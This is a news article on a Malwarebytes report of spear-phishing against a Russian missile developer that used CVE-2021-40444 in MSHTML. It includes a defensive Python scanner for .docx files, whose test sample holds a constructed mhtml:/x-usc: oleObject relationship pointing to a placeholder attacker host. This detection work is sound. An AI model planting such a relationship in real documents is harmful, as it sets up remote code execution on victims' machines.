Russian Defense Contractor Targeted via New MSHTML Vulnerability

Russian Defense Contractor Targeted in Cyberattack Exploiting Recent MSHTML Vulnerability

Cybersecurity company Malwarebytes has reported that Russian organizations, including a major defense contractor, have been targeted in cyber-espionage attacks leveraging a recently patched vulnerability in MSHTML, the Microsoft browser rendering engine that Office documents can invoke.

Attack Details

Researchers state that one of the targets was JSC “State Rocket Center named after Academician V. P. Makeyev” (JSC “Makeyev SRC”), a Russian developer of submarine-launched ballistic missiles and one of the country’s largest scientific and design centers for rocket and space technology.

The attacks followed a classic spear-phishing pattern: employees received emails carrying malicious Office documents. The lures were Word files purporting to come from the company's HR department; employees were asked to fill out a form and return it to HR or reply to the email.

“When the recipient decides to fill out the form, they are prompted to enable editing. That’s all it takes to trigger the exploit,” the experts explain.

Exploited Vulnerability

The attackers exploited CVE-2021-40444, a remote code execution bug in MSHTML (also known as Trident), the proprietary rendering engine behind Internet Explorer that Office also embeds to display web content. A crafted Office document can use it to load a malicious ActiveX control and execute attacker-supplied code on unpatched Windows systems. The flaw was a zero-day when first observed: Microsoft had already reported targeted attacks against Office 365 and Office 2019 users on Windows 10 before a fix existed, and public, easy-to-use exploits appeared soon afterwards. Microsoft patched the vulnerability in its September 2021 security updates. Note that a document opened in Protected View does not trigger the exploit, which is why the lures pressure the recipient into clicking "Enable Editing".
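As an added example (not code from the Malwarebytes report), the following triage script checks a .docx package for the relationship pattern seen in CVE-2021-40444 documents: an external relationship, typically of type oleObject, whose Target uses the mhtml: protocol handler (often with an !x-usc: suffix) to pull a remote page into MSHTML. The sample documents it builds, and the hostnames inside them, are constructed for the demonstration and are not real indicators.

```python
"""Scan a .docx for CVE-2021-40444-style mhtml: relationships."""
import io
import re
import sys
import zipfile
from xml.etree import ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TAG = f"{{{REL_NS}}}Relationship"

# The exploit documents pointed an Office relationship at a remote page via the
# mhtml: handler, e.g. "mhtml:http://host/page.html!x-usc:http://host/page.html".
MHTML_SCHEME = re.compile(r"^\s*mhtml:", re.IGNORECASE)


def find_mshtml_relationships(docx_bytes: bytes) -> list[dict]:
    """Return every relationship in the package whose Target would be handed to
    the mhtml: protocol handler. An empty list is not proof of a clean file; it
    only means this particular indicator is absent."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_TAG):
                target = rel.get("Target", "")
                if MHTML_SCHEME.match(target) or "!x-usc:" in target.lower():
                    hits.append({
                        "part": name,
                        "id": rel.get("Id"),
                        # Keep only the short relationship type, e.g. "oleObject".
                        "type": rel.get("Type", "").rsplit("/", 1)[-1],
                        "external": rel.get("TargetMode", "").lower() == "external",
                        "target": target,
                    })
    return hits


def build_sample_docx(malicious: bool) -> bytes:
    """Constructed minimal .docx: a benign HR-style hyperlink plus, optionally,
    an oleObject relationship shaped like the CVE-2021-40444 loader. Hostnames
    are placeholders, not real infrastructure."""
    ole_rel = (
        '<Relationship Id="rId3" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
        'Target="mhtml:http://attacker.example.invalid/page.html'
        '!x-usc:http://attacker.example.invalid/page.html" TargetMode="External"/>'
    ) if malicious else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        '<Relationship Id="rId1" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" '
        'Target="styles.xml"/>'
        '<Relationship Id="rId2" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
        'Target="https://hr.example.invalid/form" TargetMode="External"/>'
        f"{ole_rel}</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Scan files given on the command line, or the constructed sample if none.
    if len(sys.argv) > 1:
        samples = {p: open(p, "rb").read() for p in sys.argv[1:]}
    else:
        samples = {"constructed-malicious.docx": build_sample_docx(malicious=True)}
    for label, data in samples.items():
        for hit in find_mshtml_relationships(data):
            print(f"{label}: {hit['part']} {hit['id']} ({hit['type']}, "
                  f"external={hit['external']}) -> {hit['target']}")
```

The script works on the package structure, so it runs on an isolated analysis host without opening the document in Word. Treat any hit as worth a full look at the referenced part; absence of the indicator does not clear a file, since variants can use other relationship types or obfuscate the target.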

Other Observed Attacks

Researchers also found other Office documents carrying the same exploit, but with lures purporting to come from the Ministry of Internal Affairs and styled as notices of fines for "illegal offenses." Malwarebytes notes that it was unable to link these documents to specific targets.

Malwarebytes assesses that the attacks are the work of a state-sponsored group, but does not attribute them to any particular country.

Source

  • Malwarebytes
